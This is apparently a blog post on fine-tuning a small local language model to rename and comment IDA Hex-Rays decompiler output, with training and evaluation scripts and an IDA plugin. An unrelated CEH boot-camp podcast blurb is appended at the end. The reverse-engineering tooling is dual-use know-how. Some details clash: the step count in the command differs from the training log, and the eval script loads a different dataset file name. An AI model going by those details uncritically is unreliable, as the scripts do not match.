    url = "http://localhost:11434/api/generate"
    headers = {"Content-Type": "application/json"}
    # inform the API we are using our configured model
    payload = {"model": "iDAPalSimple", "prompt": code, "stream": False,"format": "json"}
    res = requests.post(url, headers=headers, json=payload)
    try:
        t = res.json()['response']
        t = json.loads(t)
        return t
    except:
        print(f'error unpacking response')
        print(res.json()['response'])


input_code = '''unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}'''

result = do_analysis(input_code)
print(result)

% python simple_analysis.py
{'function_name': 'new_function_name', 'comment': 'This function uses the argument a1 as an index into byte_11A2DC. It calls sub_CE2BC with an argument of 0 and sets v2 to the result of bitwise OR operation between v1 and 4 if sub_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between v1 and 0xFFFFFFFD.', 'variables': [{'original_name': 'v1', 'new_name': 'AnalyzedVarName1'}, {'original_name': 'v2', 'new_name': 'AnalyzedVarName2'}]}

At this point, the current configuration and simple Python client could be integrated into an IDA Plugin that would work ok, but we can do better.
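
As a rough sketch of what that integration could look like, the following hypothetical IDAPython glue (not the author's plugin; it assumes the Hex-Rays Python bindings are available and reuses the do_analysis client above) decompiles the current function, sends the pseudocode to the local model, and applies the suggested name, comment, and variable renames:

# hypothetical IDAPython glue - run from IDA's script window with Hex-Rays present
import ida_hexrays, ida_kernwin, idc
from simple_analysis import do_analysis  # the Ollama client shown above

def analyze_current_function():
    ea = ida_kernwin.get_screen_ea()
    try:
        cfunc = ida_hexrays.decompile(ea)
    except ida_hexrays.DecompilationFailure:
        print("decompilation failed")
        return

    result = do_analysis(str(cfunc))  # send the pseudocode to the local model
    if not result:
        return

    func_ea = cfunc.entry_ea
    # apply the suggested function name and comment, then rename local variables
    idc.set_name(func_ea, result["function_name"], idc.SN_NOWARN)
    idc.set_func_cmt(func_ea, result["comment"], 0)
    for var in result.get("variables", []):
        ida_hexrays.rename_lvar(func_ea, var["original_name"], var["new_name"])

analyze_current_function()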

Fine-Tuning - step one: draw two circles

The initial training and creation of the model weights that are released is a computationally expensive process, while follow-on fine-tuning is much less expensive to conduct. Fine-tuning provides a path to give a pre-trained model a "personality" by introducing new data and/or example interactions that would be considered "ideal" behavior when interacting with a user. The process is iterative and can be conducted multiple times until the model matches the expected behavior.

While our small local model is never going to compete with a large, hosted service, fine-tuning can be used to boost its performance so it can compete on specific tasks or knowledge domains. To carry out a fine-tune of a model, you need to complete the following steps:

  • Identify a target knowledge domain
  • Construct a dataset for your target domain
  • Train against your dataset
  • Evaluate trained model

For this task, the knowledge domain is already known - we want to fine-tune a model that can aid with analysis of Hex-Rays pseudocode. The next step is constructing a dataset; this is the difficult part. At a high level, the dataset will be made of "instruction-following" examples; for instance, the following shows what these look like:

{
  "instruction":"Assist the user with a helpful process for drawing an animal.",
  "input":"How do I draw an Owl?",
  "output":"Drawing an Owl is simple, first draw some circles, then you draw the rest of the Owl."
},
{
  "instruction":"Assist the user with an idea for an animal to draw and provide them instructions.",
  "input":"",
  "output":"There are many animals you could choose to draw, my favorite is the Owl. An Owl is a fairly basic animal to draw, first draw some circles, then you draw the rest of the Owl"
}

These examples provide two types of instruction-following dataset entries. The first example specifies the instruction to be followed, a matching input (user input), and finally the ideal output (generated result). The second example only provides an instruction along with an example output; this form is useful for generative-only responses that do not require user input. That type is not that useful for our current task but was included as an example. A dataset entry that would be useful for our task would look like the following:

{
  "instruction":"Analyze the following IDA Hex Rays pseudocode and generate a valid JSON object containing the keys 'function_name','comment', and an array 'variables' explaining what the code does, suggest a function name based on the analysis of the code, and new variable names based on the analysis of the code.",
  "input":"unsigned int __fastcall sub_C385C(int a1)\n {\n int v1;\n unsigned int v2;\n\n v1 = byte_11A2DC[a1];\n if ( sub_CE2BC(0) )\n v2 = v1 | 4;\n return v1 & 0xFFFFFFFD;\n }",
  "output":"{'function_name': 'new_function_name', 'comment': 'This function uses the argument a1 as an index into byte_11A2DC. It calls sub_CE2BC with an argument of 0 and sets v2 to the result of bitwise OR operation between v1 and 4 if sub_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between v1 and 0xFFFFFFFD.', 'variables': [{'original_name': 'v1', 'new_name': 'AnalyzedVarName1'}, {'original_name': 'v2', 'new_name': 'AnalyzedVarName2'}]}"
}

As a side note, following this exact JSON formatting will allow us to use the datasets library from Hugging Face, and it is a common format.

With the exact format needed for training identified, the next problem is that we really need thousands of these examples, ideally with high quality responses. I had considered trying to manually create the required dataset using tree-sitter to rewrite valid code with generic variable names while sourcing the function descriptions from documentation, but this sounded painful, and I wanted the machine to do the hard work for me. Looking at earlier work done by Stanford for the Alpaca project (https://crfm.stanford.edu/2023/03/13/alpaca.html), I decided to try the same style of approach: use an LLM to build the dataset from a smaller, or in this case incomplete, dataset and train against that.

After some noodling around I came up with the following high-level process:

  • compile libc with full debug/symbol information
  • load the compiled libraries into IDA and export each function's Hex-Rays output into individual files named by address (a batch-export sketch follows this list)
  • strip the compiled libraries and repeat the previous step, exporting each function's Hex-Rays output into a new set of files
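
A minimal sketch of the export step referenced above might look like the following (hypothetical IDA batch script; it assumes a Hex-Rays license, with the output directory switched between the symbol and stripped passes):

# export_pseudocode.py - hypothetical batch script, e.g.:
#   idat -A -S"export_pseudocode.py" libc.so
import os
import idautils, ida_hexrays, ida_auto, ida_pro

OUT_DIR = "symbol"  # change to "stripp" for the pass over the stripped binaries

ida_auto.auto_wait()  # let auto-analysis finish when running headless
os.makedirs(OUT_DIR, exist_ok=True)

for func_ea in idautils.Functions():
    try:
        cfunc = ida_hexrays.decompile(func_ea)
    except ida_hexrays.DecompilationFailure:
        continue
    if cfunc:
        # files are named by address so the symbol/stripped outputs can be paired later
        with open(os.path.join(OUT_DIR, f"0x{func_ea:x}.c"), "w") as f:
            f.write(str(cfunc))

ida_pro.qexit(0)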

This process creates two directories with matching files:

/symbol/0x2d7f4.c
/stripp/0x2d7f4.c

In this case the file /symbol/0x2d7f4.c contains:

void __fastcall setname(int category, const char *name)
{
  char *v3; // r0

  v3 = (char *)nl_global_locale.__names[category];
  if ( v3 != name )
  {
    if ( v3 != "C" )
      j___GI___libc_free(v3);
    nl_global_locale.__names[category] = name;
  }
}

And the file /stripp/0x2d7f4.c contains:

char *__fastcall sub_2D7F4(int a1, char **a2)
{
  char *result; // r0

  result = (char *)off_170C10[a1 + 16];
  if ( result != (char *)a2 )
  {
    if ( result != "C" )
      result = (char *)j_free();
    off_170C10[a1 + 16] = a2;
  }
  return result;
}

With the two sets of data, the next stage of processing is to generate the dataset records. At a high level, this process looks like the following:

  • using the previously created mistral-7b configuration, query with the symbol/debug Hex-Rays output to get a reasonable quality analysis
  • create a dataset entry by combining the matching STRIPPED Hex-Rays output with the analysis generated from the symbol/debug Hex-Rays output
  • iterate over all the files until complete (a sketch of this loop follows below)

After completing this step, we have a large instruction-following dataset we can use to fine-tune against.
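
A sketch of that pairing loop might look like the following (hypothetical code that reuses the do_analysis client from earlier and assumes the symbol/stripp directory layout described above):

# hypothetical pairing loop - builds dataset.json from the exported directories
import os, json
from simple_analysis import do_analysis  # the Ollama client shown earlier

INSTRUCTION = ("Analyze the following IDA Hex Rays pseudocode and generate a valid JSON object "
               "containing the keys 'function_name','comment', and an array 'variables' explaining "
               "what the code does, suggest a function name based on the analysis of the code, and "
               "new variable names based on the analysis of the code.")

records = []
for name in os.listdir("symbol"):
    with open(os.path.join("symbol", name)) as f:
        symbol_code = f.read()
    with open(os.path.join("stripp", name)) as f:
        stripped_code = f.read()

    # query the model with the symbol-rich pseudocode to get a higher quality analysis
    analysis = do_analysis(symbol_code)
    if not analysis:
        continue

    # pair that analysis with the stripped pseudocode the fine-tuned model will actually see
    records.append({
        "instruction": INSTRUCTION,
        "input": stripped_code,
        "output": json.dumps(analysis),
    })

with open("dataset.json", "w") as f:
    json.dump(records, f, indent=2)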

Heavy Customization

There are quite a few options when it comes to fine-tuning an LLM; at the time of this research project I chose to use unsloth. Other popular fine-tuning projects exist and are most likely more batteries-included.

I went with unsloth for a few reasons. The main reason is that its underlying code has been tuned to provide a large performance increase (speed/memory usage); it also seemed less likely to abstract or hide parts of the training process that may be useful to see or understand. The unsloth project also provides a Jupyter notebook that can be executed on the Google Colab free tier if you do not have hardware (works perfectly!); I ended up conducting training on a local Linux host with an NVIDIA 3090. To give an idea of performance, the free Colab tier took 21 minutes while my 3090 executed the same training in 7 minutes. Refer to the unsloth repository for install instructions; at the time of this project the installation using conda looked like the following:

conda create --name unsloth_env python=3.10
conda activate unsloth_env
conda install cudatoolkit xformers bitsandbytes pytorch pytorch-cuda=12.1 -c pytorch -c nvidia -c xformers -c conda-forge -y
pip install "unsloth[conda] @ git+https://github.com/unslothai/unsloth.git"

The script used for training was adapted from the examples provided by unsloth; it uses Hugging Face's Supervised Fine-tuning Trainer (SFT) from the Transformer Reinforcement Learning (TRL) library:

from unsloth import FastLanguageModel
import torch,sys

model = sys.argv[1]
steps = int(sys.argv[2])
training_data = sys.argv[3]

max_seq_length = 4096 # Choose any! We auto support RoPE Scaling internally!
dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.

model, tokenizer = FastLanguageModel.from_pretrained(
    #model_name = "unsloth/mistral-7b-instruct-v0.2-bnb-4bit", # Choose ANY! eg teknium/OpenHermes-2.5-Mistral-7B
    model_name = model,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
)

model = FastLanguageModel.get_peft_model(
    model,
    r = 32, # Choose any number > 0 ! Suggested 8, 16, 32, 64, 128 - r/rank is how strong you want your training to apply
    target_modules = ["q_proj", "k_proj", "v_proj", "o_proj",
                      "gate_proj", "up_proj", "down_proj",],
    lora_alpha = 16, # alpha is a multiplier against r/rank 
    lora_dropout = 0, # Supports any, but = 0 is optimized
    bias = "none",    # Supports any, but = "none" is optimized
    use_gradient_checkpointing = True,
    random_state = 3407,
    use_rslora = False,  # We support rank stabilized LoRA
    loftq_config = None, # And LoftQ
)

alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

EOS_TOKEN = tokenizer.eos_token # Must add EOS_TOKEN
def formatting_prompts_func(examples):
    instructions = examples["instruction"]
    inputs       = examples["input"]
    outputs      = examples["output"]
    texts = []
    for instruction, input, output in zip(instructions, inputs, outputs):
        # Must add EOS_TOKEN, otherwise your generation will go on forever!
        text = alpaca_prompt.format(instruction, input, output) + EOS_TOKEN
        texts.append(text)
    return { "text" : texts, }
pass

#load and convert the dataset into the prompt format
from datasets import load_dataset
dataset = load_dataset("json", data_files=training_data, split = "train")
dataset = dataset.map(formatting_prompts_func, batched = True,)


from trl import SFTTrainer
from transformers import TrainingArguments

trainer = SFTTrainer(
    model = model,
    tokenizer = tokenizer,
    train_dataset = dataset,
    dataset_text_field = "text",
    max_seq_length = max_seq_length,
    dataset_num_proc = 2,
    packing = False, # Can make training 5x faster for short sequences.
    args = TrainingArguments(
        per_device_train_batch_size = 4,
        gradient_accumulation_steps = 4,
        warmup_steps = 5,
        max_steps = steps,
        learning_rate = 2e-4,
        fp16 = not torch.cuda.is_bf16_supported(),
        bf16 = torch.cuda.is_bf16_supported(),
        logging_steps = 1,
        optim = "adamw_8bit",
        weight_decay = 0.01,
        lr_scheduler_type = "linear",
        seed = 3407,
        output_dir = "outputs",
        save_strategy= "steps",
        save_steps=50
    ),
)

gpu_stats = torch.cuda.get_device_properties(0)
start_gpu_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
max_memory = round(gpu_stats.total_memory / 1024 / 1024 / 1024, 3)
print(f"GPU = {gpu_stats.name}. Max memory = {max_memory} GB.")
print(f"{start_gpu_memory} GB of memory reserved.")

# execute the actual training
trainer_stats = trainer.train()

used_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
used_memory_for_lora = round(used_memory - start_gpu_memory, 3)
used_percentage = round(used_memory         /max_memory*100, 3)
lora_percentage = round(used_memory_for_lora/max_memory*100, 3)
print(f"{trainer_stats.metrics['train_runtime']} seconds used for training.")
print(f"{round(trainer_stats.metrics['train_runtime']/60, 2)} minutes used for training.")
print(f"Peak reserved memory = {used_memory} GB.")
print(f"Peak reserved memory for training = {used_memory_for_lora} GB.")
print(f"Peak reserved memory % of max memory = {used_percentage} %.")
print(f"Peak reserved memory for training % of max memory = {lora_percentage} %.")

model.save_pretrained(f"lora_model_{steps}") # Local saving

# Just LoRA adapters
if True: model.save_pretrained_merged(f"model_{steps}", tokenizer, save_method = "lora",)

# Save to q4_k_m GGUF
if True: model.save_pretrained_gguf(f"model_{steps}", tokenizer, quantization_method = "q4_k_m")

The script also defines the following items:

output_dir = "outputs",
        save_strategy= "steps",
        save_steps=50

This configuration saves a copy of the fine-tuned weights every 50 steps to the outputs directory, which is helpful for a few reasons. First, if an error occurs at some point (crash/power/etc.), you have checkpoints from which you can restart your training; second, it allows you to evaluate how well your training is working by comparing each saved checkpoint. While it may seem at first that more steps are better, the right number is going to depend on how large your dataset is and which settings you have configured - more is not always better.

Running this script to fine tune mistral-7b-instruct for 100 steps using the dataset we created would look like the following example output:

$ python training/train.py unsloth/mistral-7b-instruct-v0.2-bnb-4bit 100 ./dataset.json
==((====))==  Unsloth: Fast Mistral patching release 2024.2
   \\   /|    GPU: NVIDIA GeForce RTX 3090. Max memory: 23.691 GB. Platform = Linux.
O^O/ \_/ \    Pytorch: 2.2.0. CUDA = 8.6. CUDA Toolkit = 12.1.
\        /    Bfloat16 = TRUE. Xformers = 0.0.24. FA = False.
 "-____-"     Free Apache license: http://github.com/unslothai/unsloth
/mnt/new/unsloth/lib/python3.10/site-packages/transformers/quantizers/auto.py:155: UserWarning: You passed `quantization_config` or equivalent parameters to `from_pretrained` but the model you're loading already has a `quantization_config` attribute. The `quantization_config` from the model will be used.
  warnings.warn(warning_msg)
Unsloth 2024.2 patched 32 layers with 32 QKV layers, 32 O layers and 32 MLP layers.
Detected kernel version 5.4.0, which is below the recommended minimum of 5.5.0; this can cause the process to hang. It is recommended to upgrade the kernel to the minimum version or higher.
GPU = NVIDIA GeForce RTX 3090. Max memory = 23.691 GB.
4.676 GB of memory reserved.
==((====))==  Unsloth - 2x faster free finetuning | Num GPUs = 1
   \\   /|    Num examples = 2,897 | Num Epochs = 3
O^O/ \_/ \    Batch size per device = 4 | Gradient Accumulation steps = 4
\        /    Total batch size = 16 | Total steps = 500
 "-____-"     Number of trainable parameters = 83,886,080
{'loss': 1.4802, 'grad_norm': 1.6030948162078857, 'learning_rate': 4e-05, 'epoch': 0.01}
{'loss': 1.4201, 'grad_norm': 1.4948327541351318, 'learning_rate': 8e-05, 'epoch': 0.01}
{'loss': 1.5114, 'grad_norm': 1.6689960956573486, 'learning_rate': 0.00012, 'epoch': 0.02}
{'loss': 1.1665, 'grad_norm': 0.9258238673210144, 'learning_rate': 0.00016, 'epoch': 0.02}
{'loss': 0.9282, 'grad_norm': 0.6133134961128235, 'learning_rate': 0.0002, 'epoch': 0.03}
{'loss': 0.9292, 'grad_norm': 0.6610234975814819, 'learning_rate': 0.0001995959595959596, 'epoch': 0.03}
{'loss': 0.7517, 'grad_norm': 0.4809339940547943, 'learning_rate': 0.0001991919191919192, 'epoch': 0.04}
{'loss': 0.7554, 'grad_norm': 0.6171303987503052, 'learning_rate': 0.00019878787878787878, 'epoch': 0.04}
{'loss': 0.606, 'grad_norm': 0.564286470413208, 'learning_rate': 0.00019838383838383837, 'epoch': 0.05}
{'loss': 0.6274, 'grad_norm': 0.414183109998703, 'learning_rate': 0.000197979797979798, 'epoch': 0.06}
{'loss': 0.6402, 'grad_norm': 0.3489008843898773, 'learning_rate': 0.0001975757575757576, 'epoch': 0.06}
{'loss': 0.596, 'grad_norm': 0.28150686621665955, 'learning_rate': 0.0001971717171717172, 'epoch': 0.07}
{'loss': 0.5056, 'grad_norm': 0.3132913410663605, 'learning_rate': 0.00019676767676767677, 'epoch': 0.07}
{'loss': 0.5384, 'grad_norm': 0.27469128370285034, 'learning_rate': 0.00019636363636363636, 'epoch': 0.08}
{'loss': 0.5744, 'grad_norm': 0.360963374376297, 'learning_rate': 0.00019595959595959596, 'epoch': 0.08}
{'loss': 0.5907, 'grad_norm': 0.3328467011451721, 'learning_rate': 0.00019555555555555556, 'epoch': 0.09}
{'loss': 0.5067, 'grad_norm': 0.2794954478740692, 'learning_rate': 0.00019515151515151516, 'epoch': 0.09}
{'loss': 0.5563, 'grad_norm': 0.2907596528530121, 'learning_rate': 0.00019474747474747476, 'epoch': 0.1}
{'loss': 0.5533, 'grad_norm': 0.34755516052246094, 'learning_rate': 0.00019434343434343435, 'epoch': 0.1}

After training is complete, I used a small script to evaluate how each checkpoint performs. It takes the first 10 entries from the training dataset and uses their instruction and input values to generate new outputs, and it also generates an output for an input that was not in the original dataset:

from unsloth import FastLanguageModel
import torch,sys

model_name_input = sys.argv[1]

max_seq_length = 4096 # Choose any! We auto support RoPE Scaling internally!
dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.

model, tokenizer = FastLanguageModel.from_pretrained(
    #model_name = "unsloth/mistral-7b-instruct-v0.2-bnb-4bit", # Choose ANY! eg teknium/OpenHermes-2.5-Mistral-7B
    model_name = model_name_input,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
    # token = "hf_...", # use one if using gated models like meta-llama/Llama-2-7b-hf
)

alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

EOS_TOKEN = tokenizer.eos_token # Must add EOS_TOKEN
def formatting_prompts_func(examples):
    instructions = examples["instruction"]
    inputs       = examples["input"]
    outputs      = examples["output"]
    texts = []
    for instruction, input, output in zip(instructions, inputs, outputs):
        # Must add EOS_TOKEN, otherwise your generation will go on forever!
        text = alpaca_prompt.format(instruction, input, output) + EOS_TOKEN
        texts.append(text)
    return { "text" : texts, }
pass

#load and convert the dataset into the prompt format
from datasets import load_dataset
dataset = load_dataset("json", data_files="data.json", split = "train")
dataset = dataset.map(formatting_prompts_func, batched = True,)

FastLanguageModel.for_inference(model)
# do x evals of items from the dataset before training
samples = []
sample_size = 10
for x in range(0,sample_size):
    instruction = dataset[x]["instruction"]
    input       = dataset[x]["input"]
    output      = ''
    text = alpaca_prompt.format(instruction, input, output) #+ EOS_TOKEN
    sample = tokenizer([text],return_tensors = "pt").to("cuda")
    out = model.generate(**sample,max_new_tokens=4096,use_cache=True)
    out = tokenizer.batch_decode(out)
    samples.append(out[0])

# new one not in your dataset goes here
code = '''int __fastcall sub_75C80(int a1, int a2)
{
  int result; // r0
  _DWORD *i; // r3

  result = a2 - *(_DWORD *)(a1 + 12);
  for ( i = *(_DWORD **)(a1 + 48); i; i = (_DWORD *)*i )
  {
    if ( i[2] < result )
      result = i[2];
  }
  return result;
}'''

text = alpaca_prompt.format(instruction, code, output)
sample = tokenizer([text],return_tensors = "pt").to("cuda")
out = model.generate(**sample,max_new_tokens=4096,use_cache=True)
out = tokenizer.batch_decode(out)
samples.append(out[0])

print('Capturing pre training generation samples')
with open(f'results/eval_log_{model_name_input.replace("/","_")}','w') as log:
    for r in samples:
        log.write(r)

For running the script, it seemed easiest to just iterate over the checkpoints in outputs using bash:

for m in $(ls outputs); do python eval.py outputs/$m; done

Results?

So, with training out of the way, the question is, does it work? Initial testing was performed against the following input:

### Instruction:
Analyze the following IDA Hex Rays pseudocode and generate a valid JSON object containing the keys 'function_name','comment', and an array 'variables' explaining what the code does, suggest a function name based on the analysis of the code, and new variable names based on the analysis of the code.

### Input:
int __fastcall sub_B0D04(int a1, int a2)
{
  unsigned int v2; // r4
  int result; // r0

  v2 = a1 + a2;
  if ( __CFADD__(a1, a2) )
    return 0;
  result = _libc_alloca_cutoff();
  if ( v2 <= 0x1000 )
    return result | 1;
  return result;
}

As expected, the base model did not follow the requested format very well, and the function comment is low quality. At 50 training steps, the model 'understands' the expected output and matches it perfectly - the somewhat surprising result is that the function comment is better at 50 steps than at 100 steps.

Zooming out a bit and comparing further steps, the format is perfect, while the most common errors seen are confusion about what gets returned (value vs. allocated memory) and inconsistent numeric formatting (1000 vs 0x1000):

The real check is, how does this compare to the big models...

It is interesting to see that GPT3.5 is no better than our results and in fact performs worse than our 50-step results, falling into the same error as the 100-step result.

Comparing against GPT3.5 feels slightly unfair, as it is quite old; what about GPT4?

Well… that result definitely makes this whole exercise feel painful and pointless. The quality of the comment is much higher, and it also captured more variable renames. So, the end result is: just use GPT4; using a small local model is pointless.

Admitting Defeat and Using GPT4

So now that we have tried our best with our small model, we can move on and just use GPT4, though not in the way you would expect. Going back to the Alpaca project, they call out using an existing strong language model to automatically generate instruction data, whereas so far we have used our small 7b-parameter model to generate instruction data. This is where we step back slightly and redo some of our previous work, replacing our 'low quality' generated data with 'high quality' values from the current leading model.

Using the OpenAI playground, it is fairly simple to set up an 'assistant' with our instructions:

With the configuration working as expected, it's straightforward to use the API and execute the same instruction generation we had previously done:
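For reference, a minimal sketch of what that API call can look like with the openai Python package (the model name, prompt placeholder, and helper function are illustrative, not the exact script that was used):

from openai import OpenAI

client = OpenAI()  # assumes OPENAI_API_KEY is set in the environment

SYSTEM_PROMPT = "..."  # the same analysis instructions configured for the assistant

def generate_entry(pseudocode: str) -> str:
    # Send one Hex-Rays function and return the model's JSON answer as text.
    resp = client.chat.completions.create(
        model="gpt-4",
        messages=[
            {"role": "system", "content": SYSTEM_PROMPT},
            {"role": "user", "content": pseudocode},
        ],
    )
    return resp.choices[0].message.content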

I originally had no expectations about the cost of this process; to be safe, I added $50 to my account before executing the previous step and was surprised when it only cost ~$16 at the time:

Seeing that the initial run only cost $16 and the quality of the responses was good, I figured: why not use both sets of data and get twice the high-quality instruction data?

With the brand-new high-quality dataset complete, we can go back and start a new fine-tune of our mistral-7b model; in this case it was trained for 200 steps, taking snapshots every 50 steps. After training completed, both our old 'low-quality' fine-tune and the new one were evaluated against a new input that is not in either dataset.

At 50 steps, the new GPT4-trained version already performs much better at capturing variables to rename; interestingly, the LLM-trained model's description contains more direct references to the code, while the GPT4 description is slightly higher level:

At 100 steps, the variable names for the GPT4-trained model are slightly better and the description is slightly more technical, referring to specific items within the code. The LLM-trained model has picked up the extra variable renames, but they look to be in line with what the GPT4-trained model had at 50 steps. I also thought it was interesting that the LLM-trained model refers to [2] as the third field (mathematically correct):

At 150 steps, the GPT4-trained model has slightly improved the function description while maintaining the variable renames. The LLM-trained model has improved the function name to match the GPT4-trained model at 50 steps, while losing variable renames; interestingly, it now refers to [2] as the second element:

Finally, at 200 steps the GPT4-trained model has slightly tweaked its description. The LLM-trained model has rediscovered its variable renames from the 100-step version and has also refined how it references [2] within the code:

Clearly, the mistral-7b model fine-tuned against the high-quality dataset from GPT4 performs much better than the previous version. The real test is to now compare it with GPT4 directly...

That response looks like something we have seen already; at this point, I would say we have proven it is feasible to fine-tune a small local model to perform a specific task at the level of a much larger model.

Making Friends

So now that we have our fine-tuned local model, we need to hook it into IDA and feed it some Hex-Rays. There are a few other plugins that offer similar functionality:

I decided to write my own simple version; apologies in advance for any errors or poor design decisions, and the underlying fine-tuned model is available to use with whatever you like best. Building off the simple Python script shown earlier, I again chose to use Ollama's REST service instead of loading the model directly. I like this design for a few reasons (a minimal request sketch follows the list below):

  • minimal Python requirements
  • the service can be running on a remote machine with more compute
  • reload/maintenance/update will not interrupt your weeks long IDA session
  • avoids tying up that IDA session you have had running for weeks now with a large memory footprint :)
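As a minimal sketch of what such a request can look like against Ollama's /api/generate endpoint (the model name and helper function are illustrative, not the plugin's actual code; requires the requests package):

import json
import requests

OLLAMA_URL = "http://localhost:11434/api/generate"  # default local Ollama endpoint

def query_model(pseudocode: str, model: str = "aidapal") -> dict:
    payload = {
        "model": model,
        "prompt": pseudocode,
        "stream": False,      # return a single response object
        "format": "json",     # ask Ollama to constrain the output to valid JSON
    }
    r = requests.post(OLLAMA_URL, json=payload, timeout=300)
    r.raise_for_status()
    return json.loads(r.json()["response"])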

To set up Ollama to use the new model, download the weights and Modelfile into the same directory and configure Ollama:

% ollama create aidapal -f aidapal.modelfile
transferring model data
using existing layer sha256:d8ff55be57629cfb21d60d4977ffb6c09071104d08bce8b499e78b10481b0a3a
using existing layer sha256:2af02daf0820d322d7e928bec1d7398090f4679c49c24c67575b5cffa7f08668
using existing layer sha256:0c3d95e257e4029eb818625dbf1627a4ca182eefcdbc360d75c108afda3cf458
using existing layer sha256:3da0ba8b21dda1aba779a536319f87fbed8ee78e80b403ce2c393cec6d58e1a9
creating new layer sha256:5fe21ec0a43781478cefd5a2b4b047651c889e08f1d7e4bf7e8bc5a7413e425a
writing manifest
success

Loading the plugin can be done through the IDA menu (File->Script File). After loading, the script provides a new context menu option when right-clicking within a Hex-Rays window:
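For anyone curious how such a context-menu entry is typically wired up in IDAPython, a rough sketch looks like the following (not the plugin's actual code; the action name and label are made up):

import ida_kernwin

ACTION_ID = "aidapal:query"  # hypothetical action name

class QueryHandler(ida_kernwin.action_handler_t):
    def activate(self, ctx):
        print("model query triggered")  # placeholder for the real request/apply logic
        return 1

    def update(self, ctx):
        return ida_kernwin.AST_ENABLE_ALWAYS

ida_kernwin.register_action(
    ida_kernwin.action_desc_t(ACTION_ID, "Query aiDAPal model", QueryHandler())
)

class PopupHook(ida_kernwin.UI_Hooks):
    def finish_populating_widget_popup(self, widget, popup):
        # only offer the action in pseudocode (Hex-Rays) windows
        if ida_kernwin.get_widget_type(widget) == ida_kernwin.BWN_PSEUDOCODE:
            ida_kernwin.attach_action_to_popup(widget, popup, ACTION_ID, None)

hook = PopupHook()
hook.hook()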

In this example the plugin has been configured with a single model; if you have other models loaded within your Ollama service, they can be added and will appear within the context menu as well. After activating the menu item, the plugin queries the selected model with the Hex-Rays code and returns a dialog when it is complete:

Within this dialog, each returned value can be accepted individually by selecting its checkbox (enabled by default) and clicking Accept; clicking Cancel rejects everything and closes the dialog.

In this example, the results are accepted and applied fully:

This example shows rejecting the function name and description, only applying the variable renames:

There is also nothing stopping you from accepting all changes multiple times:

Another consideration I had when creating aiDAPal was implementing some form of data lookup like Retrieval Augmented Generation (RAG), but in the spirit of keeping things simple I came up with the idea of treating the IDA database (IDB) as a lookup/knowledge base. The basic idea is that whenever the plugin is activated, it identifies any references within the code being analyzed, retrieves any comments that exist at the target locations, and includes them as a multi-line comment before the function that is sent for analysis. An example of this workflow can be seen in the following image:
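A rough IDAPython sketch of that lookup idea (not the plugin's exact implementation; the function names are illustrative):

import idautils
import idc

def collect_reference_comments(func_ea):
    # Walk every instruction in the function, follow its outgoing references,
    # and collect any regular or repeatable comments found at the targets.
    comments = []
    for item_ea in idautils.FuncItems(func_ea):
        for xref in idautils.XrefsFrom(item_ea, 0):
            cmt = idc.get_cmt(xref.to, 0) or idc.get_cmt(xref.to, 1)
            if cmt:
                comments.append("%s: %s" % (idc.get_name(xref.to), cmt))
    return comments

def build_prompt(func_ea, pseudocode_text):
    # Prepend the gathered comments as a multi-line comment before the code
    # that gets sent to the model.
    comments = collect_reference_comments(func_ea)
    header = "/*\n" + "\n".join(comments) + "\n*/\n" if comments else ""
    return header + pseudocode_text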

For this example, the WDT_ICR register location is queried for any comments; if one exists, it gets extracted and included in our request. Something to consider is that in this case the WDT_ICR register is common and part of the 'base knowledge' stored within the original trained weights, so it would have been identified fine without the extra comment. This can be confirmed by querying the underlying model for this information:

% ollama run mistral:7b
>>> give me a single sentence description of the WDT_ICR register
 The WDT_ICR (Watchdog Timer Independent Counter Register) is a control register in the watchdog timer unit that triggers a reset upon being written, allowing configuring the watchdog timer's independent counter.

By using the IDB as an extra source of knowledge as shown previously, we can use our own information/knowledge to better guide the response. In the following image the comment associated with the WDT_ICR register has been changed, resulting in the model returning a different response that takes into account the additional knowledge provided by the IDB:

Currently, this functionality does not extract information from comments that may be defined at the start of a function; while that would be useful and give context as to what a called function does, it would often result in the inclusion of a large number of extra tokens, potentially exhausting the underlying model's context window and returning low-quality results.

The End?

While I am sure I made mistakes along the way, I hope this information is helpful to anyone wanting to fine-tune an LLM for local usage, whether that is making a better version of the one we are sharing or something completely different. It is also worth noting that most of this project was executed earlier this year (Feb/March); since then, a handful of new models have been released that it would be interesting to explore and adapt this research to (phi3-med/llama3/Codestral). If you made it this far, thanks for reading.

All files related to this project can be found on our GitHub (https://github.com/atredispartners/aidapal).

Inside a CEH boot camp: Advice from an Infosec instructor

By: Infosec
6 June 2024 at 18:00

Infosec and the Cyber Work Hacks podcast are here to help you pass the Certified Ethical Hacker (CEH) exam! So for today’s hack, we’re talking about boot camps. The CEH exam, no matter how you slice it, is the definition of the phrase, “It’s a marathon, not a sprint.” With 125 questions and four hours to answer them, there’s a mental game at work here that goes well beyond rote memorization of terms and tools. That’s why I wanted to get an insider’s look from Infosec boot camp instructor Akyl Phillips! Phillips will explain what the Infosec five-day CEH boot camp is like, the learning and retention strategies you’ll employ, and all the ways that boot camp training can help you pass on the first try. Phillips has taught pentesters and red teamers at all levels, from sheer beginners to people already in the field, and this episode is a look into how it works. Book yourself a front-row seat for another Cyber Work Hack.

0:00 - How to pass the CEH exam
3:17 - What is a CEH boot camp?
4:02 - Things to know before the CEH exam
5:30 - How does the CEH exam test practical skills?
6:46 - The day-to-day of an Infosec boot camp
11:08 - What is CEH exam day like?
12:14 - Is a cybersecurity boot camp right for me?
13:12 - Outro

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
